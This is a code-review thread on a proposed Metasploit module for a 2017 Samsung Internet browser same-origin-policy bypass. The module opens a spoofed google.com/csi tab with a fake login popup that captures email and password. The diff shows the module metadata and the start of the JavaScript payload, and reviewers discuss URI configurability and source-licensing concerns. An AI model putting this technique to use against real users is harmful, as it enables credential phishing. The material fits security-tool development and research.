modules/auxiliary/gather/browser_sop_bypass.rb

```diff
@@ -0,0 +1,54 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Samsung Internet Browser SOP Bypass",
+        'Description'    => %q(
+          This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password.
+          Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra',
+        ],
+        'References'     => [
+        ['URL', 'http://fr.0day.today/exploit/description/28434'],
+        ],
+        'DisclosureDate' => "Nov 08 2017",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = %|
+<html><body><script>
+function go(){
+var x = window.open('https://www.google.com/csi');
```

Comment:
So is this a Google-specific vulnerability?

Reply:
Hi @todb-r7 
I had a look on this, where if we set windows.open location to `https://microsoft.com/` it redirects to the actual website, however moving further i simply added a `.` i.e `https://microsoft.com./` then the code works perfect, this is not specific to Google, but we need to add `.` in URI for working of this exploit, please advise should we move further into this.

Reply:
Okay, so you need to let the URI be configurable by the user via a normal option, and have a default be something innocuous like `example.com`. Take a look at some other modules which configure a destination URL to see what those options look like.

However, unless we can get clarity on the terms of use from 0day.today as mentioned in [this comment](https://github.com/rapid7/metasploit-framework/pull/9180#issuecomment-342866060) I don't see how we can land this.